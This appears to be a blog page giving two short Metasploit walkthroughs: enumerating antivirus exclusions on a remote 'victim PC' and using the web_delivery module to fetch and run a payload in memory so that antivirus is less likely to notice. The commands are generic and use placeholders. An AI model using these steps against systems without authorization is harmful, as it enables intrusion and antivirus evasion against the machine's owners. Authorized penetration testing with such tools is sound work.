Wednesday, 20 January 2016
Friday, 15 January 2016
How to Get Information of Antivirus in Remote Victim PC using Metasploit
Windows Antivirus Exclusions Enumeration
This module will enumerate the file, directory, process and extension-based exclusions from supported AV products, which currently includes Microsoft Defender, Microsoft Security Essentials/Antimalware, and Symantec Endpoint Protection.
Module Name
post/windows/gather/enum_av_excluded
msf > use post/windows/gather/enum_av_excluded
msf post(enum_av_excluded) > sessions
...sessions...
msf post(enum_av_excluded) > set SESSION <session-id>
msf post(enum_av_excluded) > show options
...show and set options...
msf post(enum_av_excluded) > run
Thursday, 14 January 2016
Web Delivery metasploit Script
This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > show targets
...targets...
msf exploit(web_delivery) > set TARGET <target-id>
msf exploit(web_delivery) > show options
...show and set options...
msf exploit(web_delivery) > exploit
Subscribe to:
Comments (Atom)